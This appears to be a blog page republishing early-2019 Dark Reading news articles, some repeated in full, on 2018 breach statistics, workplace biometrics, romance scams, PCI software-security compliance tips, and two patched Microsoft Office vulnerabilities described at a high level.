STE WILLIAMS

More than 6,500 data breaches were reported in 2018, a new report from Risk Based Security shows.

The breaches, both big and small, were reported through Dec. 31, 2018 — marking a 3.2% decline from the 6,728 breaches reported in 2017 and making it the second-most active year for data breaches on record. Some 5 billion records were exposed, or about 36% less than the nearly 8 billion records exposed in breaches in 2017. In addition, more records were compromised last year than in any previous year than 2017 and 2005.

As has been the case previously, a handful of mega breaches accounted for a vast proportion of the compromised records. In 2018, the 10 largest breaches accounted for approximately 3.6 billion exposed records — or a startling 70% of the total. In all, 12 breaches in 2018 exposed at least 100 million records. Organizations that disclosed the largest breaches last year included Facebook, Under Armor, Starwood Hotels, and Quora.

For a vast majority of breaches, however, the number of exposed records was 10,000 or less — as has been the case since at least 2012.

The medical and education sectors, often denigrated for having poor security, ironically enough exposed far fewer records than other supposedly more secure sectors. Risk Based Security’s analysis shows that financial services companies, technology firms, retailers, restaurants, hotels, and other businesses were responsible for nearly 66% of the reported breaches and a near identical proportion of the records that were exposed last year. In contrast, the medical and education sectors combined exposed less than 10 million records.

More than six in 10 of the breaches exposed email addresses, and about 57% involved passwords. The proportion of breaches that exposed Social Security numbers and credit card numbers — the two most valuable pieces of data for criminals — was somewhat smaller in contrast, at 13.9% and 12.3%, respectively.

Risk Based Security’s report shows that hacking by malicious external actors remained the cause for most data breaches (57.1%), but Web breaches, such as those resulting from intrusions and data publicly accessible via search engines, exposed more records (39.3%). Insider breaches — of the accidental, negligent, and malicious variety — accounted for about 14% of all breaches last year.

The Breach Disclosure Struggle
One surprise in the data was the scant progress that organizations appear to be making in closing the gap between breach discovery and breach disclosure, says Inga Goddijn, executive vice president at Risk Based Security.

The data shows that government and private institutions took an average of 49.6 days last year to publicly report a breach after its initial discovery. That was actually marginally longer than the 48.6 days it took in 2017, suggesting that organizations are struggling to speed up incident response despite the increased pressure on them to do so in recent years.

“What we found was, after three years of closing the gap between discovery and reporting, the average number of days between those two dates was stagnant in 2018,” Goodijn says.

The general anticipation was that mandates such as the European Union’s General Data Protection Regulation would put pressure on enterprise organizations to improve breach disclosure times.  So it was surprising to see little movement on that front last year. “It’s hard to say why it is still taking nearly 50 days to disclose a breach,” Goodijn notes. “It could be we have reached a plateau, where it simply takes two to three weeks to conduct a full investigation and another two to three weeks to work through preparing and releasing a notification.”

The GDPR also has a clear distinction between disclosing a breach to authorities and notifying victims about it, Goddijn says. The mandate requires breach entities to inform data regulators in their jurisdictions about the incident within 72 hours. But it offers some discretion around when and even whether an organization needs to notify those impacted by a breach “So even if an event is swiftly reported to privacy regulators, it is possible the event will be publicly disclosed weeks later, if at all,” Goddijn says.

Risk Based Security’s report does not include “dwell time,” or the duration between when an attacker first breaks into a network and when the intrusion is first discovered. But it does show that nearly 70% of organizations that disclosed a data breach in 2018 learned of it from an external source. In fact, only 680 of the more than 6,500 disclosed breaches last year were internally discovered.

“If we look at the rate of internal discovery verses external discovery, we can see that many organizations are still learning of the incident from external sources, such as law enforcement, fraud detection, independent researchers, or even their own customers,” Goddijn notes. “Our assumption is that organizations that are better able to detect a breach will also be better positioned to respond. That’s something we’ll be taking a closer look at in 2019.”

Related Content:

• Data Breach Threats Bigger Than Ever
• 2018 on Track to Be One of the Worst Ever for Data Breaches
• 7 Common Breach Disclosure Mistakes
• 2019 Security Spending Outlook

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: https://www.darkreading.com/threat-intelligence/2018-was-second-most-active-year-for-data-breaches/d/d-id/1333875?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Many consumers have been using some form of biometrics on their smartphones in their personal lives for several years. Now a new survey indicates that 70% of them want to use biometrics at work, too.

The “Biometric Consumer Sentiment Survey,” released by Veridium today, is based on responses from 1,000 US adults who have experience using biometrics to log into accounts. Respondents cited speed (35%), not having to remember passwords (33%), and security (31%) as the main reasons for looking favorably on biometric authentication.

“What’s clear is that passwords have not evolved,” says James Stickland, CEO of Veridium. “They have only grown more complex and confusing, so we’re finding that consumers want to move the experience they’ve had with biometrics to the workplace.”

George Avetisov, CEO of HYPR, says biometrics in the workplace will start at the executive level, with smartphones for top execs, and work its way down to the rank-and-file staff.

“We’ve seen this with deployments at financial institutions,” Avetisov says. “On the consumer side, we’re seeing large financial companies looking to use biometrics in the payments arena for their customers.” 

Acceptance Takes Time
Though companies began introducing biometrics into the authentication process decades ago, consumers first started using it on a wider scale when biometrics were installed on smartphones, Stickland says. The Motorola Atrix 4F was the first phone to include a fingerprint sensor, made available to consumers in 2011.

Today, consumers routinely use a mix of fingerprint and facial recognition technology on their  iPhones (68%), Android phones (25%), laptops (12%), tablets (11%), and smart speakers (5%), the Veridium survey found.

Respondents also indicated their most preferred form of biometric identification on their phones is the fingerprint, at 63%. It ranked way ahead of other forms of identification, such as facial recognition (14%), traditional passwords and PINs (8%), and voice recognition (2%).

Broken down by generation, Millennials most value speed (46%), Generation X most value not having to remember passwords (44%), and Baby Boomers most value security (30%).

“We’ve also found that there’s an ever-growing crowd of people who support eliminating the password,” Stickland says.

Related Content:

• US Judge: Police Can’t Force Biometric Authentication
• New Study Details Business Benefits of Biometrics
• 4 Payment Security Trends for 2019
• Biometrics Are Coming So Are Security Concerns

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Steve Zurier has more than 30 years of journalism and publishing experience, most of the last 24 of which were spent covering networking and security technology. Steve is based in Columbia, Md. View Full Bio

Article source: https://www.darkreading.com/endpoint/authentication/70--of-consumers-want-biometrics-in-the-workplace/d/d-id/1333867?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Many consumers have been using some form of biometrics on their smartphones in their personal lives for several years. Now a new survey indicates that 70% of them want to use biometrics at work, too.

The “Biometric Consumer Sentiment Survey,” released by Veridium today, is based on responses from 1,000 US adults who have experience using biometrics to log into accounts. Respondents cited speed (35%), not having to remember passwords (33%), and security (31%) as the main reasons for looking favorably on biometric authentication.

“What’s clear is that passwords have not evolved,” says James Stickland, CEO of Veridium. “They have only grown more complex and confusing, so we’re finding that consumers want to move the experience they’ve had with biometrics to the workplace.”

George Avetisov, CEO of HYPR, says biometrics in the workplace will start at the executive level, with smartphones for top execs, and work its way down to the rank-and-file staff.

“We’ve seen this with deployments at financial institutions,” Avetisov says. “On the consumer side, we’re seeing large financial companies looking to use biometrics in the payments arena for their customers.” 

Acceptance Takes Time
Though companies began introducing biometrics into the authentication process decades ago, consumers first started using it on a wider scale when biometrics were installed on smartphones, Stickland says. The Motorola Atrix 4F was the first phone to include a fingerprint sensor, made available to consumers in 2011.

Today, consumers routinely use a mix of fingerprint and facial recognition technology on their  iPhones (68%), Android phones (25%), laptops (12%), tablets (11%), and smart speakers (5%), the Veridium survey found.

Respondents also indicated their most preferred form of biometric identification on their phones is the fingerprint, at 63%. It ranked way ahead of other forms of identification, such as facial recognition (14%), traditional passwords and PINs (8%), and voice recognition (2%).

Broken down by generation, Millennials most value speed (46%), Generation X most value not having to remember passwords (44%), and Baby Boomers most value security (30%).

“We’ve also found that there’s an ever-growing crowd of people who support eliminating the password,” Stickland says.

Related Content:

• US Judge: Police Can’t Force Biometric Authentication
• New Study Details Business Benefits of Biometrics
• 4 Payment Security Trends for 2019
• Biometrics Are Coming So Are Security Concerns

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Steve Zurier has more than 30 years of journalism and publishing experience, most of the last 24 of which were spent covering networking and security technology. Steve is based in Columbia, Md. View Full Bio

Article source: https://www.darkreading.com/endpoint/authentication/70--of-consumers-want-biometrics-in-the-workplace/d/d-id/1333867?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

US-CERT and Cupid don’t often keep company, but this Valentine’s Day is being marked by new threats to those seeking romance and new warnings from the federal cybersecurity group.

A notice from US-CERT points to an FTC blog post about how consumers can protect themselves from online scams involving dating sites, personal messaging systems, and the promise of romance and companionship from online strangers.

The general warning comes as specific scams are being exposed by online researchers. For example, researchers at Agari Data have followed a Nigeria-based group dubbed “Scarlet Widow” since 2017 as they exploited vulnerable populations, moving from romantic “attacks” against isolated farmers and individuals with disabilities to business email compromises that raised the financial stakes.

Security experts aren’t optimistic about finding a quick solution.

“These types of scams will not be disappearing anytime soon,” says Anupam Sahai, vice president of product management at Cavirin. “Certain times of the year, Valentine’s Day included, bring out both the best and the worst in us. Here, hackers prey on those most vulnerable, especially those who are possibly recovering from a family tragedy without a support network. Given the emotions, it is no surprise that romance scam losses, averaging $2,600 each, are seven times greater than most other frauds.”

The primary issue is that these attacks aren’t assaults on technology vulnerabilities — they prey on human limitations.

“These kinds of romance scams are very targeted social engineering attacks, effectively ‘hacking’ the victim’s emotions rather than trying to perform a technical assault,” says Nathan Wenzler, senior director of cybersecurity at Moss Adams. “Unfortunately, these kinds of attacks are becoming more and more commonplace, not only because of the large financial incentive, but because it has become easier than ever to tailor these scams for each individual victim.”

Online dating profiles and social media accounts add to the rich data sources that allow criminals to tailor attacks as they look to exploit individuals in the same way that spear-phishing attacks exploit corporate employees to extract credentials and critical business data.

The FTC provides tips for avoiding victimization that include never sending money to an online romantic contact, taking the relationship slowly, doing an online image search to see whether the photo for the person’s account appears with a different name, and discussing the relationship with friends and family members from real life. US-Cert has its own set of tips for staying safe on social media.

“No matter how desirable a person may sound online, everyone must tread with caution,” says Chris Morales, head of security analytics at Vectra. “Only trust those you know in person, and even then be cautious. In our connected society, everyone needs to remember a basic rule we were taught as a child, especially with people you can’t even look in the eye: Don’t talk to strangers.”

Related Content:

• How Cybercriminals Clean Their Dirty Money
• Online Fraud: Now a Major Application Layer Security Problem
• 6 Ways to Beat Back BEC Attacks
• DOJ Announces Indictment in Nigerian Banking Scam

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and … View Full Bio

Article source: https://www.darkreading.com/endpoint/scammers-fall-in-love-with-valentines-day/d/d-id/1333869?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

US-CERT and Cupid don’t often keep company, but this Valentine’s Day is being marked by new threats to those seeking romance and new warnings from the federal cybersecurity group.

A notice from US-CERT points to an FTC blog post about how consumers can protect themselves from online scams involving dating sites, personal messaging systems, and the promise of romance and companionship from online strangers.

The general warning comes as specific scams are being exposed by online researchers. For example, researchers at Agari Data have followed a Nigeria-based group dubbed “Scarlet Widow” since 2017 as they exploited vulnerable populations, moving from romantic “attacks” against isolated farmers and individuals with disabilities to business email compromises that raised the financial stakes.

Security experts aren’t optimistic about finding a quick solution.

“These types of scams will not be disappearing anytime soon,” says Anupam Sahai, vice president of product management at Cavirin. “Certain times of the year, Valentine’s Day included, bring out both the best and the worst in us. Here, hackers prey on those most vulnerable, especially those who are possibly recovering from a family tragedy without a support network. Given the emotions, it is no surprise that romance scam losses, averaging $2,600 each, are seven times greater than most other frauds.”

The primary issue is that these attacks aren’t assaults on technology vulnerabilities — they prey on human limitations.

“These kinds of romance scams are very targeted social engineering attacks, effectively ‘hacking’ the victim’s emotions rather than trying to perform a technical assault,” says Nathan Wenzler, senior director of cybersecurity at Moss Adams. “Unfortunately, these kinds of attacks are becoming more and more commonplace, not only because of the large financial incentive, but because it has become easier than ever to tailor these scams for each individual victim.”

Online dating profiles and social media accounts add to the rich data sources that allow criminals to tailor attacks as they look to exploit individuals in the same way that spear-phishing attacks exploit corporate employees to extract credentials and critical business data.

The FTC provides tips for avoiding victimization that include never sending money to an online romantic contact, taking the relationship slowly, doing an online image search to see whether the photo for the person’s account appears with a different name, and discussing the relationship with friends and family members from real life. US-Cert has its own set of tips for staying safe on social media.

“No matter how desirable a person may sound online, everyone must tread with caution,” says Chris Morales, head of security analytics at Vectra. “Only trust those you know in person, and even then be cautious. In our connected society, everyone needs to remember a basic rule we were taught as a child, especially with people you can’t even look in the eye: Don’t talk to strangers.”

Related Content:

• How Cybercriminals Clean Their Dirty Money
• Online Fraud: Now a Major Application Layer Security Problem
• 6 Ways to Beat Back BEC Attacks
• DOJ Announces Indictment in Nigerian Banking Scam

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and … View Full Bio

Article source: https://www.darkreading.com/endpoint/scammers-fall-in-love-with-valentines-day/d/d-id/1333869?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

When the PCI Software Security Council (PCI SSC) released the new PCI Software Security Framework in January 2019, it took a progressive leap forward, drastically raising security standards for the payments industry. The framework was created in an effort to align with newly emerging and rapidly advancing technologies in the payments ecosystem.

The new standards require that payments application vendors implement enhanced security controls to adhere to a strictly defined security process. At a high level, the process requires that applications be designed, developed, and maintained to protect the integrity of all payment transactions as well as sensitive data collected in association with those transactions.

In the framework, there are two standards. The PCI Secure Software Standard defines security requirements and assessment procedures for payment applications. The PCI Secure Software Lifecycle (Secure SLC) Standard covers the secure development of applications throughout the whole development cycle. While the former is mandatory and the latter is optional, organizations that can demonstrate compliance with the Secure SLC Standard can forgo the required assessment for every release. This kind of process acceleration is crucial for organizations that employ agile and/or DevOps development processes. 

The Secure SLC Standard not only improves business efficiency for payment application vendors but also has the potential to stand as new security benchmark for other industries to follow. 

5 Compliance Tips
Software developers are adopting more competitive software life-cycle management techniques with faster release cycles, and the PCI Standards were designed to better support these agile environments. To help comply with the PCI Software Security Standards, consider the following:

1. Devise a systematic process for building security in early and maintaining this throughout the SLC.
“The traditional software development lifecycle [addresses] security concerns in the testing phase, which results in very expensive fixes or, worse, security issues that aren’t uncovered until operation. Secure development practices integrate security-related activities in each phase of the SDLC, yielding benefits by making security a continuous concern rather than simply part of test procedures,” as Archer Batcheller et al. put it in a report from 2017. The Secure SLC Standard requires payment applications vendors to use a documented secure software development policy and corresponding strategy. These must establish measurable rules for ensuring that the vendor’s services and products are secure and that its security and compliance obligations are fulfilled.

2. Define and assign security roles and responsibilities in your organization.
In a survey of 29 security leaders, conducted by secureCISO in Phoenix 2018, it was found that 100% of C-level executives, VPs, and security engineers believe that a lack of security skills and awareness poses the greatest challenge to their development of an application security program. Part of facing this challenge involves clearly defining security roles and assigning responsibilities, along with appropriate training to ensure that each role has the requisite skills to carry out its responsibilities. The new PCI standard requires that you identify specific personnel who are responsible for various components of the Secure SLC and provide them with training on the PCI Software Security Framework. Pay close attention to the roles recommended by the standard and identify any gaps that need to be filled using existing employees, contractors, or new hires.

3. Automate threat identification and definition of security controls. 
The Secure SLC Standard requires that threats are identified before development begins. These threats are managed throughout the software life cycle through the implementation and testing of security controls. This essentially stipulates that organizations perform threat modeling activities and/or security requirements management (referred to as ASRTM or Application Security Requirements and Threat Management by Gartner). Generally, this involves maintaining a database of known threats and continuously identifying which of those apply to your application based on its architecture and specific technological makeup.

4. Create a process for continuously identifying and fixing security defects.
This should include regular and continuous testing, which most organizations accomplish with one or more of static analysis, dynamic analysis, or interactive analysis security testing tools, alongside periodic, manual penetration testing. Test results should map back directly to specific security controls you’ve defined to create traceability and ensure controls were correctly implemented.

5. Communicate with clients and stakeholders about security.
The Secure SLC Standard requires that vendors provide adequate guidance related to the secure installation, configuration, and use of their applications. Hence, in addition to a secure development process, the deployment process must be secure. Also, all stakeholders must be informed in a timely manner regarding any security-related changes to the software or any new vulnerabilities that are discovered. Vendors should create a mechanism, such as a security email alias for clients and external researchers, to notify them of any discovered vulnerabilities.

The PCI Framework in the Bigger Picture
As modern payment technologies evolve, the new PCI Software Security Framework will be crucial for ensuring that the integrity of payment transactions and sensitive data are protected. But the framework also may play a significant role in setting a new security standard for other industries that have equal or greater needs for secure software assurance. Historically, the PCI Data Security Standard (DSS) referenced the Open Web Application Security Project (OWASP) Top 10 in September 2006.

After this point, it became widely referenced by dozens of other compliance documents worldwide. PCI has taken a leadership role in setting the precedent for software security baselines, and we believe that other standards and regulations will similarly take note of the heightened security of payment software resulting from the software security framework. Thankfully, we’re at a point where there is an abundance of comprehensive, professional resources to help organizations comply with the new framework. Now, it’s only a matter of whether organizations choose to use them.

Related Content:

• 7 Real-Life Dangers That Threaten Cybersecurity
• Turn the NIST Cybersecurity Framework into Reality: 5 Steps
• PCI Council Releases New Software Framework for DevOps Era
• PCI SSC Releases New Security Tools for Small Businesses

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Rohit Sethi, COO of Security Compass, is responsible for setting and achieving corporate objectives, company alignment, and driving strategy to execution. He specializes in software security requirements management (SSRM), working with large companies in various industries to … View Full Bio

Article source: https://www.darkreading.com/application-security/5-expert-tips-for-complying-with-the-new-pci-software-security-framework-/a/d-id/1333835?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

When the PCI Software Security Council (PCI SSC) released the new PCI Software Security Framework in January 2019, it took a progressive leap forward, drastically raising security standards for the payments industry. The framework was created in an effort to align with newly emerging and rapidly advancing technologies in the payments ecosystem.

The new standards require that payments application vendors implement enhanced security controls to adhere to a strictly defined security process. At a high level, the process requires that applications be designed, developed, and maintained to protect the integrity of all payment transactions as well as sensitive data collected in association with those transactions.

In the framework, there are two standards. The PCI Secure Software Standard defines security requirements and assessment procedures for payment applications. The PCI Secure Software Lifecycle (Secure SLC) Standard covers the secure development of applications throughout the whole development cycle. While the former is mandatory and the latter is optional, organizations that can demonstrate compliance with the Secure SLC Standard can forgo the required assessment for every release. This kind of process acceleration is crucial for organizations that employ agile and/or DevOps development processes. 

The Secure SLC Standard not only improves business efficiency for payment application vendors but also has the potential to stand as new security benchmark for other industries to follow. 

5 Compliance Tips
Software developers are adopting more competitive software life-cycle management techniques with faster release cycles, and the PCI Standards were designed to better support these agile environments. To help comply with the PCI Software Security Standards, consider the following:

1. Devise a systematic process for building security in early and maintaining this throughout the SLC.
“The traditional software development lifecycle [addresses] security concerns in the testing phase, which results in very expensive fixes or, worse, security issues that aren’t uncovered until operation. Secure development practices integrate security-related activities in each phase of the SDLC, yielding benefits by making security a continuous concern rather than simply part of test procedures,” as Archer Batcheller et al. put it in a report from 2017. The Secure SLC Standard requires payment applications vendors to use a documented secure software development policy and corresponding strategy. These must establish measurable rules for ensuring that the vendor’s services and products are secure and that its security and compliance obligations are fulfilled.

2. Define and assign security roles and responsibilities in your organization.
In a survey of 29 security leaders, conducted by secureCISO in Phoenix 2018, it was found that 100% of C-level executives, VPs, and security engineers believe that a lack of security skills and awareness poses the greatest challenge to their development of an application security program. Part of facing this challenge involves clearly defining security roles and assigning responsibilities, along with appropriate training to ensure that each role has the requisite skills to carry out its responsibilities. The new PCI standard requires that you identify specific personnel who are responsible for various components of the Secure SLC and provide them with training on the PCI Software Security Framework. Pay close attention to the roles recommended by the standard and identify any gaps that need to be filled using existing employees, contractors, or new hires.

3. Automate threat identification and definition of security controls. 
The Secure SLC Standard requires that threats are identified before development begins. These threats are managed throughout the software life cycle through the implementation and testing of security controls. This essentially stipulates that organizations perform threat modeling activities and/or security requirements management (referred to as ASRTM or Application Security Requirements and Threat Management by Gartner). Generally, this involves maintaining a database of known threats and continuously identifying which of those apply to your application based on its architecture and specific technological makeup.

4. Create a process for continuously identifying and fixing security defects.
This should include regular and continuous testing, which most organizations accomplish with one or more of static analysis, dynamic analysis, or interactive analysis security testing tools, alongside periodic, manual penetration testing. Test results should map back directly to specific security controls you’ve defined to create traceability and ensure controls were correctly implemented.

5. Communicate with clients and stakeholders about security.
The Secure SLC Standard requires that vendors provide adequate guidance related to the secure installation, configuration, and use of their applications. Hence, in addition to a secure development process, the deployment process must be secure. Also, all stakeholders must be informed in a timely manner regarding any security-related changes to the software or any new vulnerabilities that are discovered. Vendors should create a mechanism, such as a security email alias for clients and external researchers, to notify them of any discovered vulnerabilities.

The PCI Framework in the Bigger Picture
As modern payment technologies evolve, the new PCI Software Security Framework will be crucial for ensuring that the integrity of payment transactions and sensitive data are protected. But the framework also may play a significant role in setting a new security standard for other industries that have equal or greater needs for secure software assurance. Historically, the PCI Data Security Standard (DSS) referenced the Open Web Application Security Project (OWASP) Top 10 in September 2006.

After this point, it became widely referenced by dozens of other compliance documents worldwide. PCI has taken a leadership role in setting the precedent for software security baselines, and we believe that other standards and regulations will similarly take note of the heightened security of payment software resulting from the software security framework. Thankfully, we’re at a point where there is an abundance of comprehensive, professional resources to help organizations comply with the new framework. Now, it’s only a matter of whether organizations choose to use them.

Related Content:

• 7 Real-Life Dangers That Threaten Cybersecurity
• Turn the NIST Cybersecurity Framework into Reality: 5 Steps
• PCI Council Releases New Software Framework for DevOps Era
• PCI SSC Releases New Security Tools for Small Businesses

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Rohit Sethi, COO of Security Compass, is responsible for setting and achieving corporate objectives, company alignment, and driving strategy to execution. He specializes in software security requirements management (SSRM), working with large companies in various industries to … View Full Bio

Article source: https://www.darkreading.com/application-security/5-expert-tips-for-complying-with-the-new-pci-software-security-framework-/a/d-id/1333835?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Microsoft Office, ubiquitous on enterprise and personal computers, is a hot target for cybercriminals and a key focus area for researchers hoping to find bugs before the bad guys do.

Stan Hegt and Pieter Ceelen, both security researchers and red teamers with security firm Outflank B.V., have been exploring a range of attack techniques that abuse Microsoft Office features. Their previous research, shown at DerbyCon 2018, demonstrated how abusing legacy functionality (a macro language that predates VBA, for example) bypasses security controls.

Outflank B.V. is a small, specialized security firm focused on red teaming, Hegt explained in an interview with Dark Reading. During most engagements, they attempt to remotely compromise workstations. Remote entry is among the toughest attacker methods, says Hegt. “It forces us to innovate, but we don’t see that much innovation in this respect, in the wild.”

Early findings prompted them to analyze flaws within the functionalities embedded into the Office suite. And since DerbyCon, the duo has continued to research Office and uncover new security holes.

“To dive into Microsoft Office, there’s so much to go into,” says Hegt. “When we dove in with the purpose of DerbyCon, we noticed there were many points to go left or right with additional research. Every path led to more cool stuff we could present to the world.”

As part of their ongoing research, Hegt and Ceelen found “at least two things that were not according to spec” – and resulted in two vulnerabilities being recently patched by Microsoft. One CVE uses the old feature of fields in Microsoft Word, in combination with macro buttons (no VBA required) to steal the contents of any file on disk. Another CVE uses fields in combination with templates and headers to build phishing documents without the use of macros.

“There are plenty of new defenses being built into Microsoft Office, but there are so many archaic features,” Heft continues. “Many times, those archaic features can be exploited to evade or abuse modern defenses.”

Both bugs the team discovered can be exploited to steal information; one steals files, the other goes after credentials. Further, they say, both combine legacy features in ways that likely weren’t foreseen. The researchers note their analysis shows that the kind of Office malware currently seen in the wild is “just the tip of the iceberg” of what’s possible in Office threats.

At Black Hat Asia, coming up March 26-29 in Singapore, Hegt and Ceelen will take the stage to present their talk “Office in Wonderland,” in which they will disclose details on new Word and Excel vulnerabilities, release attack vectors which Microsoft deemed Office features, and demonstrate the security impact of the architectural design of the full Office suite.

Getting Bugged Down

As part of its January Patch Tuesday release, Microsoft issued CVE-2019-0561, a Microsoft Word information disclosure vulnerability discovered as part of Hegt and Ceelen’s research. The flaw exists when Word macro buttons are improperly used, and a successful attacker could target the vulnerability to read arbitrary files from a targeted system, according to Microsoft.

To exploit CVE-2019-0561, an attacker would have to create a malicious file and convince the user to open it. They would have to know the location of the file whose data they want to steal. Microsoft’s patch for CVE-2019-0561 addresses the vulnerability by changing the way some Word functions handle security warnings.

Microsoft’s February Patch Tuesday release yesterday included CVE-2019-0540, addressing another bug discovered by Hegt and Ceelen. This is a Microsoft Office security feature bypass flaw that exists when Office doesn’t validate URLs. Attackers can send victims specially crafted files to trick them into entering credentials and perform a phishing attack.

“A lot of organizations rely on username and password combinations,” says Ceelen. “As an attacker it’s very much in interest to go collect usernames and passwords.” This bug lets attackers send plain docs without any macros, and it will alert the target with a pop-up to enter their credentials. “We slowly see bad guys abusing these techniques,” he continues.

The patch addresses the vulnerability by ensuring Office properly validates URLs. While Ceelen points to an attacker focus on Word and Excel, given they have the longest history, he notes Microsoft has upped its patching game. “We see them making steps in all directions,” Ceelen says.

Both CVE-2019-0561 and CVE-2019-0540 were classified as Important in severity by Microsoft. Neither was publicly known or exploited in the wild prior to the release of their patches.

Related Content:

• New Zombie ‘POODLE’ Attack Bred from TLS Flaw
• Cybersecurity and the Human Element: We’re All Fallible
• 2019 Security Spending Outlook
• Experian: US Suffers the Most Online Fraud

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial … View Full Bio

Article source: https://www.darkreading.com/endpoint/researchers-dig-into-microsoft-office-functionality-flaws/d/d-id/1333870?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple